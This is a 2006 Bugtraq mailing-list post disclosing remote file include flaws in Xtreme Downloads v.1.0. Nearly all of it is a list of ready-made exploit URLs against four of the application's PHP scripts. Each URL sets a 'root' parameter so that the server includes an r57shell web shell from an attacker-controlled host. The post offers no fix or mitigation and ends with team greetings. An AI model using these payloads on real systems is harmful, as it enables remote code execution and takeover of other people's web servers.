[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
file include in Xtreme Downloads v.1.0
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: file include in Xtreme Downloads v.1.0
- From: gamr-14@xxxxxxxxxxx
- Date: 5 Jun 2006 20:59:10 -0000
Multiple file include exploits in Xtreme Downloads v.1.0
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt?
category.php
http://www.example.com/path/admin\scripts/category.php?root=http://yoursite/r57shell.txt?
add_allow.php
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt?
####################################################
#######################
emails:
gamr-14@xxxxxxxxxxx & black-cod3@xxxxxxxxxxx
#######################
All my respect to our friends , lezr.com
done .. peace